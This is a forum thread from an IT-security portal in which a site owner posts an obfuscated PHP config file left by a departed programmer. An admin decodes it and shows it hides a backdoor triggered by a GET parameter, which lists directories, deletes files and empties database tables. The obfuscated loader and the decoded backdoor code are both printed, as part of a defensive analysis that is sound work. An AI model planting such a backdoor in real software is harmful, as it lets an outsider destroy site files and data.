 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 75
 Members: 0
 Total: 75
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
If someone could please decode this... I would be eternally |
|
 Posted: Wed Jan 13, 2010 2:41 pm |
 |
|
| puntofuturo |
| Beginner |
 |
|
| Joined: Jan 13, 2010 |
| Posts: 1 |
|
|
|
 |
|
 |
|
Hello everyone
I did make a site in php
but .. the programmer who has literally evaporated, escaped
with the advance that I gave him not finishing the job.
I am now opening the config.inc file encrypted.
anyone knows how to decrypt it?
<?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=2572;eval((base64_decode('JE8wMDBPME8wMD1mb3BlbigkT09PME8wTzAwLCdyYicpO3doaWxlKC0tJE8wME8wME8wMClmZ2V0cygkTzAwME8wTzAwLDEwMjQpO2ZnZXRzKCRPMDAwTzBPMDAsNDA5Nik7JE9PMDBPMDBPMD0oYmFzZTY0X2RlY29kZShzdHJ0cihmcmVhZCgkTzAwME8wTzAwLDcyNCksJ1d1MjRNejFIb2dwc1NPeXFLclZ0UDVmQy9aSlRrM1VZYkxqMGkrdjZSUWNhR0VkSTluRDhBaGxYN0J4Rm13ZU49JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?>
Jf/Rp2LQkXO+32biVzrPPzwtr5gfr5gY5izVPhG6PA5V5i5VCAButPP6CViQgj/Rof5DZf3Qp2kRp27cC27QqlOL3vzGT1+dJCgQTv3ksv+ApVkGgMLP5zuYPA5V5i5VChZuP+OTghOzP+ZzP+wyKPhzghAQpV+mY2bRJCO8ZCKRgzwtr5gfr5gTgALP5zuYVMwt5233pVivgjbLZCg+ZliRgDbRsjQksjiN/lzl/fnGJfBQkv+dZh9dJCKQgD9iChOzP+ZzP+G6VzrPPzwothOPghAQpViQZ1++p23PJ1+8oHO0kv+932uQkDuGTlOaZfKb31mb/fBI31L+kjuiTlhLJf7dgDiFgMwqS4uqS4uqS4h+kv56CXg+k1nL/lPRghwYri+Sr5wYgD9jgDodgMwqt8uqSMm9S27jgDoGp1gLklPlOzwiZfOIZ1PRkXrD3HoRZ6g+/fKRgMm9S4uqSMm9S29itAm9SMm9S4W9pV965XPDOMhxSPLIZXu8PAwBkPED56rKOfZ4shQp51G855+jt1R9JVElO+gr/lzHrfrgyfBMyMzRTzbXK6L1TC3+t0A6s23uKiOMrPZHVM+pVAnOtiwKP5gt5z5f5hLZfvzj/lr+Zv3RJfQaT1hdTXunk6OA3CZXUH+xS4MDS8KhO0k7yVGIgDiQpViFZvOGTXO+p2rqS4W9t8uqS4WQyl5l/f9RgMwqS4uqS4uqS2iF4KR0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS04KRit5+tPPnTglLIkXK6CVWgo2WbqVW6T1w0/fnRTXOAg8GO2jrOf5OrtzG63CO+kvBLTfP6CVWwo230/CZLT1nQTv+DJfB6g8GO2jrOf5OrtzG6k1z8kX3IkvK6CVWwo2k8S4M9S0W6y9ApgMhZPhzSfD3i/CrL/vz8ZV33o4AbglOL3vzGT1+dJCgQTvk6y9ApoDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0o9Apg1+dkH5AClBLTfPbqVW6KPg4rM51rALgtMhythurg8GO2jS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDSO2jr0TlBdZfOAJfwdo4AbTC+8kfnY/lwdTv5032bit5+tPPnTglLIkXK6CV9it5+tPPnTgX58ZCgd/fh+ghAGgMhZPhzSfD39/CO83lwDZ233ptGO2v+vo2bLg1OITvB+/XrQTl7Qo1rQZVb6Vfh9TXO8JfgQT1Pb/lwdTv5A315Dklib/VuOU5Ort4RbgDBEUCOnTzw+k6gIkjbQptGO2vhBkXzGCXO+T1503zwi/jbit5+tPPnTglrL31zj/CO+ghAQy9ApoDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0o9ApJf/RgzwHr5rTglr+T15AZV33o4Awo2knS0SAOt/Xy4i6ptRO2v+vp2rYrA5PfD3GJCOAghAQybApZ65d/XrQTl7bT1+83zwiJCoRgHuL31bGg1n+3v5GpKApU9ApJf/RJCOYZ1+Dp2r9/CrRpViO26GO2v+vp2r0TlBAZfBAkDWwo1w9ZfBiJCoRgHuL31bQpKApU9Ap3lLQT1PRp2rdTlr+o4Abkv5LZ1rQkjbi/lwd315d3HSQpVWLqtAbZvzGklPQ4KQF4KQQZjbiTvwiZVMwgD76o2/vo2rdTlr+otA6sj76pKApU9ApJf/RJCOYZ1+Dp2r9/CrRsjkIgD7iTvwiZViQ2Vu+/lLIo2r9/CrRsjkIgD7iTvwiZV76q1gDqjkF4KQGJCOAClrQkjbjgHuL31bIg1BIZ1Pjs2rGZCZ+T2GnptGO26AO26AO26AO26AO26AO2v50J1mbT1+83zwiJCoRgD7dsDkGo4WQy9ApZfBiJf/F4KQQZjbiCA3z5zG6Zv+GZV33ptRO2jrvJfn+o4AbgzwHr5rTglZQT1P6CtGO2v+vp1+8ClrQkjbiZv+GZViQybAp/lLETlKRg1ZQT1PGo4WXO8kQy9ApZfORTDW6kli6y9ApZfn8ZtRO2vORTfwip2rvJfn+s2W9O8kXptGO265dT1+dJDbiZv+GZViF4KQ+TvrQZ0GO2v5dZ1+vy9ApJf/RgzwHr5rTgXrL/vn+ghAQybApgHrL/vn+o4AbgzwHr5rTgXrL/vn+ghAF4KQEUCOnTzwn3f5DUVbjrM5Sr5rzoMZVtAAbgHrL/vn+oz3or5gzo4Mjs2Wi/lwdTv5031+ITjiF4KQ+TvrQZ0GO2v57JCKRS2iF4KQ+TvrQZ0GO2jS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDS0oDSO2vZhTvOAJfwdo13+3zwi/Cr+ClZDTlhYTC+8kf9Rg1rL31PQ4KQF4KRiTv5XClrL31PbqVu+UHuGTlr+p2kEgD9bg1rL31PQy9ApgHg+3zwi/Cr+o4Abg1B+3hwi/Cr+f8g3sjkIgD7iTv5XClrL315TS5AdgDm6sjrdZC3YZ1zAZ5G9CtGO26g+3H5DTjWikv5AClrL31PF4KQw4KQv3fB031+ITjuE/fE+CXrQTfPRg1rL315AJfh+pKApU9ApgH+Do4AbkX5jkXrDp2ri/Cr+31+EZV99s4KQy9Apg1hITjWwoHOh/6OAkjbiZ1zAZCrQTfPGOV9DptGO2jri/CibqVu83fg83HoRg1rL315AJfh+s4bGSjiF4KRiJHobqVu83fg83HoRg1rL315AJfh+s4Mns4oQy9Apg1hQTjWwoHOh/6OAkjbiZ1zAZCrQTfPGStKGSjiF4KRikl50o4AbkX5jkXrDp2ri/Cr+31+EZV9nOD9DptGO26g+3H5DTjuEJXrQTfPRg1LDs2rEJf7GgHO+/D9iTfwds2ri/CiGgH+DptGO26AO2vZhTvOAJfwdo13+3zwQZ2biJfKQ4KQF4KQQZjbiJfKmqtiQ2Kigg1B+3hwQZ4A6S4W9S2kdg1+iy9ApJf/Rg1+iq0ibgj/bg1+iq4AByVig2VrdZC3YJfKwg8W9S2kdg1+iy9ApJf/Rg1+iq0iBo2/vo2rQZ49wytiBpKigg1B+3hwQZ4A6S4W6sjrQZ4GO2v+vp2rQZ47Bytibgj/bg1+iq4ABytiBpKiiTv5XCl+iqVk9gD7iJfKF4KQQZjbiJfKeytiByVig2KiiTv5XCl+iqVrQZ4GO26g+3H5DTjWiTv5XCl+iy9ApYKAp |
|
|
|
|
|
|
|
|
| Posted: Wed Jan 13, 2010 3:26 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
It's really evil script 
Besides containing useful code it contains backdoor which
1. allows to list all directories and files below target directory
2. allows to delete any file below target directory
3. allows to empty any table in database
And by the way it contains MySql credentials, so posting it here is not good idea, at least without masking credentials with asterisks.
Here is the backdoor from script:
| Code: |
###########################################
if($_GET['delete'] == '123456789')
{
if($_GET['list'])
{
function list_dir($path,$level)
{
if(is_dir($path))
{
if($contents = opendir($path))
{
while(($node = readdir($contents)) !== false)
{
if($node!='.' && $node!='..')
{
if(is_dir($path.'/'.$node)) echo $path.'/'.$node.'<br>';
list_dir("$path/$node",$level+1);
}
}
}
}
}
echo list_dir('../', 0);
}
if($_GET['file'])
{
$file = $_GET['file'];
if(is_dir($file))
{
chmod($file, 0777);
echo 'si';
}
else
{
chmod($file, 0777);
unlink($file);
}
}
if($_GET['table'])
{
$table = $_GET['table'];
mysql_query("DELETE FROM $table WHERE 1", $connection);
}
exit(0);
}
###########################################
|
Now, if we throw out that evil backdoor and little sitelock code snippet, then here is the cleaned version:
| Code: | <?php
###########################################
$MYSQL['host'] = 'localhost';
$MYSQL['username'] = '********';
$MYSQL['password'] = '********';
$MYSQL['database'] = '********';
###########################################
$input_name = 'ABCDEFGHILMNOPQ';
###########################################
$connection = mysql_connect($MYSQL['host'],$MYSQL['username'],$MYSQL['password']);
if (!$connection) die('Impossibile connettersi a MySQL: '.mysql_error());
mysql_select_db($MYSQL['database']);
###########################################
function get_date_from_mysql($date)
{
$new_date = explode('-', $date);
$ret_date = $new_date[2].'/'.$new_date[1].'/'.$new_date[0];
return $ret_date;
}
function make_time($datetime)
{
$yr = substr($datetime,0,4);
$mon = substr($datetime,5,2);
$day = substr($datetime,8,2);
$hr = substr($datetime,11,2);
$min = substr($datetime,14,2);
$sec = substr($datetime,17,2);
return mktime($hr,$min,$sec,$mon,$day,$yr);
}
function get_id($id)
{
if($id<=9) $new_id='0000'.$id;
if($id>9 && $id<=99) $new_id='000'.$id;
if($id>99 && $id<=999) $new_id='00'.$id;
if($id>999 && $id<=9999) $new_id='0'.$id;
if($id>9999) $new_id=$id;
return $new_id;
}
?>
|
[/code] |
|
|
|
|
|
www.waraxe.us Forum Index -> PHP script decode requests
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
